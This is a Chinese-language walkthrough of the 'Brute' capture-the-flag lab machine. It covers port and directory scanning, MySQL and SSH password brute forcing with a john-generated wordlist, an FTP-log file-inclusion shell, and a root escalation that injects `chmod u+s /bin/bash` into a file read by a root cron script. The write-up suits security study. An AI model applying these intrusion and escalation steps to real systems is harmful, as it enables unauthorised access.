Skip to main content

Brute

端口扫描

root@ip-10-10-29-11:~/ettubrute# nmap -sTCV -p- --min-rate 1000 10.10.78.120

Starting Nmap 7.60 ( https://nmap.org ) at 2023-10-04 08:32 BST
Nmap scan report for ip-10-10-78-120.eu-west-1.compute.internal (10.10.78.120)
Host is up (0.00029s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 3.0.3
22/tcp   open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Login
3306/tcp open  nagios-nsca Nagios NSCA
| mysql-info: 
|   Protocol: 10
|   Version: 8.0.28-0ubuntu0.20.04.3
|   Thread ID: 24
|   Capabilities flags: 65535
|   Some Capabilities: SwitchToSSLAfterHandshake, Support41Auth, LongColumnFlag, SupportsCompression, ODBCClient, SupportsLoadDataLocal, Speaks41ProtocolOld, IgnoreSigpipes, FoundRows, Speaks41ProtocolNew, ConnectWithDatabase, SupportsTransactions, InteractiveClient, LongPassword, IgnoreSpaceBeforeParenthesis, DontAllowDatabaseTableColumn, SupportsAuthPlugins, SupportsMultipleResults, SupportsMultipleStatments
|   Status: Autocommit
|   Salt: O\x19~\x16
| ve\x0B\x0Egf\x17C\x1Bi\x06m\x1C]Z
|_  Auth Plugin Name: 96
MAC Address: 02:E4:7D:04:55:5B (Unknown)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

3306

进行暴力破解

image-20240709171651591

得到密码后登录 Mysql 在数据库中发现了一个账号并且密码存在加密image-20240709171656908

解密得到消息

image-20240709171704945

80

root@ip-10-10-29-11:~/ettubrute# gobuster dir -u http://10.10.78.120/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.78.120/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt,html
[+] Timeout:        10s
===============================================================
2023/10/04 08:41:47 Starting gobuster
===============================================================
/index.php (Status: 200)
/welcome.php (Status: 302)
/logout.php (Status: 302)
/config.php (Status: 200)
/server-status (Status: 403)
===============================================================
2023/10/04 08:42:47 Finished
===============================================================

使用破解的密码访问我们的 80 站点, 我发现其中有一个按钮

image-20240709171714706

在此尝试之后我发现其是 FTP 的登陆日志记录, 所以直接配合文件包含写 Shell

image-20240709171721398

后渗透

www-data

利用上面的方式我获取了一个 Shell

image-20240709171734522

image-20240709171740953

www-data —> adrian

在用户 adrian 家目录枚举时我发现其提供了一个文件, 这告诉的应该是 adrian 的用户密码规则

(remote) www-data@brute:/var$ cat /home/adrian/.reminder
Rules:
best of 64
+ exclamation

ettubrute

我们生成一个密码

root@ip-10-10-29-11:~/ettubrute# echo ettubrute | john --stdout --pipe '--rules=best64' > wordlist
Using default input encoding: UTF-8
Press Ctrl-C to abort, or send SIGUSR1 to john process for status
76p 0:00:00:00 0.00% 844.4p/s erutee
root@ip-10-10-29-11:~/ettubrute# sed -i 's/$/!/' wordlist

进行暴力破解, 获取到用户的 SSH 密码

image-20240709171751189

adrian —> root

在 adrian 家目录枚举时我发现一些特殊文件

  • ftp : 在这个文件中存在一个笔记告诉我, 管理员让 adrian 每分钟打卡一次
  • punch_in.sh : 这个就是执行的脚本
  • punch_in : 查看其输出我知道这应该就是 adrian 打卡的记录
adrian@brute:~$ ls -al
total 48
drwxr-xr-x 4 adrian adrian  4096 Apr  5  2022 .
drwxr-xr-x 3 root   root    4096 Oct 19  2021 ..
lrwxrwxrwx 1 adrian adrian     9 Oct 20  2021 .bash_history -> /dev/null
-rw-r--r-- 1 adrian adrian   220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 adrian adrian  3771 Feb 25  2020 .bashrc
drwx------ 2 adrian adrian  4096 Oct 19  2021 .cache
drwxr-xr-x 3 nobody nogroup 4096 Oct 20  2021 ftp
-rw-r--r-- 1 adrian adrian   807 Feb 25  2020 .profile
-rw-r----- 1 adrian adrian   940 Oct  4 09:17 punch_in
-rw-r----- 1 root   adrian    94 Apr  5  2022 punch_in.sh
-rw-r--r-- 1 adrian adrian    43 Oct 20  2021 .reminder
-rw-rw-r-- 1 adrian adrian    75 Apr  5  2022 .selected_editor
-rw-r--r-- 1 adrian adrian     0 Oct 19  2021 .sudo_as_admin_successful
-rw-r----- 1 adrian adrian    21 Apr  5  2022 user.txt
-rw------- 1 adrian adrian     0 Apr  6  2022 .viminfo

我上传了 pspy 检查定时任务发现特殊之处

  • punch_in.sh : 这是以 adrian 身份运行
  • root 用户执行一个脚本用于检查 punch_in 的内容

image-20240709171801895

所以我修改了 punch_in.sh 脚本内容使其不向punch_in 输入内容, 同时修改 punch_in 内容使其变为执行命令

(remote) adrian@brute:/home/adrian$ echo "123;\`chmod u+s /bin/bash\`" > punch_in
(remote) adrian@brute:/home/adrian$ cat punch_in
123;`chmod u+s /bin/bash`

之后等待即可, 要是不放心可以使用 pspy 继续监听一下, 不管好像这时候就没哪个输出了你只能看到 check_in 脚本的执行

(remote) adrian@brute:/home/adrian$ ls -al /bin/bash
-rwsr-xr-x 1 root root 1183448 Jun 18  2020 /bin/bash